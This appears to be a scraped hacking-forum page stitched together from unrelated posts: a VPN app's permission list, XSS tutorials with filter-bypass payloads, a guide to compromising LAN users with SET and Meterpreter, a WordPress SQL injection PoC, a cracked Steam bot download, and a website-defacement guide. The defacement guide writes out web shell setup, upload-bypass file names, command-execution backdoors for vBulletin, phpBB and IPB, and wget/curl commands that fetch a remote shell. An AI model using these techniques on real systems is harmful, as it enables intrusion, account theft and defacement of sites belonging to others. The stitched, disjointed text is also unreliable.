CyberGhost 5 - VPN & Proxy 5.0.14.11

Permissions For CyberGhost 5 - VPN & Proxy 5.0.14.11

android.permission.READ_EXTERNAL_STORAGE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.GET_TASKS
android.permission.BIND_NOTIFICATION_LISTENER_SERVICE
android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.CHANGE_NETWORK_STATE
android.permission.CHANGE_WIFI_STATE

CyberGhost DownloadLink by Ikehara

New Admin : Ikehara Yuifum

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

XSS Introduction

This is a simple online explaination of XSS attacks designed to allow people to see in a hands on manner.

It is interactive so that people can see the effects in real time, and to be simpler to follow.

1. Introduction: Setup the cookie
2. Simple cookie stealing
3. Basic filtered input
4. Evading simple filtering
5. I can run script, what now?
6. Protecting against these attacks

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

 

What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.  
Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.It will be easy to understand XSS , if you have the following prerequisite:

• Strong Knowledge in HTML,javascript(Reference ).
• Basic Knowledge in HTTP client-Server Architecure(Reference )
• [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability. 

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

 

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

 

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

 

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field. 

 

View the source of the page . Find the location where input displayed place in previous test.

 

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

 

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

 

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Session Hijacking(Stealing session)
• Malware Attack
• Website Defacement
• Denial of Service attacks(Dos)

Bypassing The XSS Filter Technique: XSS Tutorial Part 2

Disclaimer:

This article is intended for educational purpose only.

PART 2  by Yoshimura Heikichi

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Hi friends, last time, i explained what is XSS and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come)

.

Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become

<script>alert(>xss detected<)</script>

Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only.

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically.
For Eg:
<scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.

This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:  alert("hi"); can be converted to

String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)

so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.

String.fromCharCode() is a javascript function that converts ASCII value to Characters.

How to convert to ASCII values?

There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon .

After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()

Now it will popup small window. enter the code for instance alert("Hi").  click ok button.  Now we got the output.

copy the code into the <script></script> inside and insert in the vulnerable sites

For eg: 

hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

2.HEX Encoding

we can encode our whole script into HEX code so that it can't be filtered.
For example:  <script>alert("Hi");</script> can be convert to HEX as:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Now put the code in the vulnerable site request.
For ex: 

hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

 Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/

3.Bypassing using Obfuscation

Some website admin put the script,alert in restricted word list.  so whenever you input thiskeywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). 
For eg:

<ScRipt>ALeRt("hi");</sCRipT>

This bypass technique rarely works but giving trial is worth.

4. Closing Tag

Sometimes putting "> at the beginning of the code will work.

"><script>alert("Hi");</script>

This will end the previous opened tag and open our script tag.
Example:

hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

Conclusion:

From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application or test yourself.

Also there are lot of different filter bypassing technique, i just covered some useful techniques for you.

Disclaimer:

This article is intended for educational purpose only.

Hacking Any Pc on LAN (with BackTrack).

Hacking Any Pc on LAN (with BackTrack).

In this Tutorial,I'll show you how you can -

# Make a Fake Webpage.

# Control Victim PC on LAN .

# Steal his files or destroy his PC.

For this you will need -

# Backtrack 5

# Internet Connection on a LAN

# Brain and Patience.

So Lets get it started.

Today we are going to hack a remote PC on LAN.LAN (local area network) is used in schools,libraries,collages,hostels,dorms,airport,or in your locality.Backtrack is a live OS and has powerful tool for hacks and in it we are going to use SET toolkit. So first you have to know about SET.

What is SET ?

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element.SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation tool-set  The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.With This toolkit you can make fake and scripted pages.

Now,Back To Work -

Step 1 -
Open up your Terminal and Change your work directory into /pentest/exploits/set/

OR

Step 2 -

Go To Menu and open Social Engineering Toolkit(SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options.

Step 3 -

When user open a website,78% of times they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit BrowserExploit Method" because we will attack via victim browser.

Step 4 -

Now we will choose the "Web Templates" option,because we will use the sites that already provided by Social Engineering Toolkit.

Step 5 -

There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google. Ofcourse you are more than invited to use your imagination.

Step 6 -

We are doing the attack on an unknown pc,so we don't know what kind of pc he/she is using,for example antivirus,browser,hardware configuration etc.So we will choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database.

Step 7 -

Now choose "Windows Shell Reverse_TCP Meterpreter",you are more-than-invited to use your creativity.

Step 8 -

Now for an connection we'll set up the Connect back port to attacker computer. In this example I use port 2838, but you can change to any port you like.

Step 9 -

The next step : just wait until all process completed and also wait until the server running.this may take some time.

Step 10 -

Now when the server has started runnuing,it will show up a command like this ->

Now give this link to user via facebook chat,mail,or anything and provoke him/her to click on it,once they do the page will load it with all malicious script to attack victim computer.

Step 11 -

Now if there is any vulnerability in victim computer it will return sessions value that mean the exploit has successfully attacked the victim computer.In case their is an exploit,it will automatically create a new fake process named "Notepad.exe".

Step 12 -

To view active sessions that we have opened by the exploit type "sessions -l" it'll listen for any active sessions. Take a look to the ID…we will use that ID to connect to victim computer.For example ->

Step 13 -

To interact and connect to victim computer use command"sessions -i ID". ID is numerical value that given when you do-sessions -l. For example you can see example in picture below.

Step 14 -

If you do everything right,the end result would be an opened meterpreter. By the help of meterpreter,you can do almost anything.For example type "systeminfo" and this will give you all the hardware and software information.You can shutdown and restart the victim pc (get the commands from here : http://www.computerhope.com/shutdown.htm ) or delete one of his system file and corrupt his/her pc.
You can do this on a remote pc (outside LAN) too if you own a web server of vpn.

Warning "This tutorial is only for education purposes,doing thing with somebody who hates you would give you a free ride to jail if they find out it was you."

Tamanaha Takakazu

WordPress Video Gallery 2.7 SQL Injection

# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerabilitiey

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss


# Date : 2015-02-11

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox 

######################

# Vulnerability Disclosure Timeline:

2015-02-08: Discovered vulnerability
2015-02-09: Vendor Notification
2015-02-10: Vendor Response/Feedback 
2015-02-10: Vendor Send Fix/Patch 
2015-02-11: Public Disclosure 

# Description

Wordpress Video Gallery 2.7 suffers from SQL injection


######################

# PoC

http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]


#####################

# Fix/patch sended by apptha's developer

File: videogalleryrss.php

Change line n.47 

from:

$vid = filter_input(INPUT_GET,'vid');
to:

$vid = intval(filter_input(INPUT_GET,'vid'));

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Steam Bot - Push your Gametime on Steam! | SteamGameFaker [CRACKED]

Hey.

Today I will puplish a crack for the SteamGameFaker bot.
The Bot will push your gametime on Steam.
You don't need to have the games installed.

Original thread: http://www.elitepvpers.com/forum/elite-g...st29887613


You will get your Trading Cards while the bot is running, too.

Virustotal:
https://www.virustotal.com/de/file/0c6b4...416172884/


DOWNLOAD

Download here

Instructions:

1. start SteamGameFaker.exe
2. put your steam link in it (http://steamcommunity.com/id/[USERNAME])
3. click on "Fill list from Steamcommunity"
4. click on "Start all Games"
5. Now they will open all games hidden and u get your gametime!

How to Deface Website/Forums Detailed ?

Here I will show you how to deface a website

First of all you will need shell. I will give you modified c100 shell which I use and it is undetectable.

Download Link: DL c100v2 FUD - Mediafire
Download Link: DL c100 Not FUD - Mediafire

If you are using c100v2 skip the part about setting username/password because it don't have it. If you are using c100 wich is false positive, disable your av and continue with tutorial. First when you download c100.php you will need to edit it with notepad. And set your Username and Password, so that only one who know

user/pw can access shell and website.



Thee green part, Username and passowrd edit as you like. But the md5 pass must be crypted. For that you go to 

Crypo.com - Here you will make your pas MD5 

So on crypo.com you write the password you writed in c100.php in my case it is hackforums and for that I

get this MD5 password, copy it and paste in our shell c100.php 

Code:

ad3dd2ebd28e5d7f81ec326fbdf1fa7b

So in my case c100 should look like this

Code:

$login = "Dimitrije"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "hackforums"; //password
$md5_pass = "ad3dd2ebd28e5d7f81ec326fbdf1fa7b"; //md5-cryped pass. if null, md5($pass)

When you do that, save it and now find on website place where you can upload some file. Sometimes the

website will block .php extension so you will have to bypass it. First open your shell with notepad and then Save As and change the

extension to one of these 

Code:

shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;

If website doesn't have any place where you can upload files, but have place where you can add news o

new event or something you can use meta http-equiv to make redirection from website to your deface page. You do that by adding this

code in news 

Code:

<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

You could also use javascript

Code:

<script type="text/javascript">
<!--
window.location = "http://www.link_to_your_deface_page.html"
//-->
</script>

Once you find admin panel upload your shell, if you can't upload .php directly upload it with modified

extensions as I stated above. 



After you uploaded it find the link where you uploaded it, example if you uploaded it in images then it will be

in site/images/c100.php After you enter the link the new Pop up windows will apear and it will ask you for login. Here you write you

username and password your wrote in c100.php. After that you should get in website.

Sometimes simply extension hiding will not work so you will have to use one addon for firefox [url=https://addons.mozilla.org/en-

US/firefox/addon/live-http-headers/]Live HTTP Headers[/url] Install it and then hide shell extension, go to the upload section. Open Live

HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some

websites) so we will have to change that hided .php.jpg extension into the .php. So as we uploaded the shell and opened the Live

HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the

shell. Select it and then click on button reply. 



After that you will have to find once again the same line of code which shows that you have uploaded

shell. So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in

this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.



It should take you to the shell screen and if it doesn't you will have to find manually where shell has been

uploaded and go to that link. Niote: This doesn't work for every website but work for a lot. Now you are in website.



Find main index.php and edit it with your deface page source code, and click save. Thats it 

Uploading shell on forums

// - vBulletin - //

To upload shell on vbulletin, we must have admin account with the access to tje tamplate and plug-ins.

1) Go to Plugins & Products, and click Add new Plugin, fill in a form like this

Code:

Product : vBulletin

Hook Location : global_start

Title : default_plugin (moze biti i bilo sta drugo)
Execution Order : 5

Plugin PHP Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();

After you fill the information, save.

2) Now go to Styles & Templates --> Style Manager, and when selecting default style choose Edit Template. Choose from home templates

and expand it, and then click on ForumHome and edit. At first there is this code

Code:

$header
$navbar

That should be replaced with

Code:

$header
$execcode
$navbar

And then save

3) Now go to the forum starting page (forum home page), there sould be written somewhere "Cannot execute blank command"
In index.php we add -->

Code:

?cmd=wget http://www.link_to_shell.com/shell.txt;mv shell.txt shell.php

It should look like this then -->

Code:

http://site.com/forums/?cmd=wget http://www.link_to_shell.com/shell.txt;mv shell.txt shell.php

This download the content of shell.txt and rename it to shell.php We access to shell in directory of forum,

so if forum is installed in site.com/forums, shell is in site.com/forums/shell.php

If you are not able to reach across the shell wget, you can try to curl. In index.php add this:

Code:

?cmd=curl http://www.link_to_shell.com/shell.txt > shell.php

-->It then looks liek this ->

Code:

http://www.site.com/forums/index.php?cmd=curl http://www.link_to_shell.com/shell.txt> shell.php

// - phpBB - //

You log in as admin, choose the right Security Settings, scroll to Allow php in templates. That value must

be placed on Yes, if it is not set to yes. do it. When you do this go to Styles-->Templates-->Edit. For template choose faq_body.html
below:

Code:

<!-- INCLUDE overall_header.html -->

we add:

Code:

<!-- PHP -->
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->

We save that and then go to

Code:

site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt

Shell is ready in site.com/forum/shell.php

// - IPB - //

This works for usual admins on ipb forum, because there are two types of admin (root and normal). So

we log in, select the tab at top named Lock and Feel then go to Manage Languages, we choose language and then section, for example

public_help
Now we edit help_txt
Choose a topic from the list, or search for a topic
in right field, add this code:

Code:

${${print $query='cd cache; wget http://link_do_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}

When you add that, press GO at bottom. Now we go to

Code:

site.com/index.php?app=core&module=help

And the our code we added will execute and you will get your shell in site.com/cache/shell.php
Why cache, because it is by default chmod to 777-an

// - SMF - //

First we have to download some theme for smf. I used this one for example:

Code:

http://custom.simplemachines.org/themes/index.php?lemma=2216

Once you downloaded that theme, you pick up some shell and add it to .rar of that theme. Now log in to

admin panel and below Configuration part choose: Themes and Layout. Choose Install a New Theme and browse. Then pick up .ra

archive with theme you downloaded and put your shell in it. Then press install. When the theme is installed you could access to you

shell-->

Code:

site.com/forum/Themes/ime_arhive/shell.php

// - MyBB - //

So we log in as admin to site.com/admin and then go to Templayes&Style tab. Then you see what theme

is being used. You will see that by numbers of users that are next to theme name.Then to to templates at left and click on templates of

theme that is used. Search for Index Templates. Open it and click on index. Delete all code there and paste your deface page source.Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

( Admin )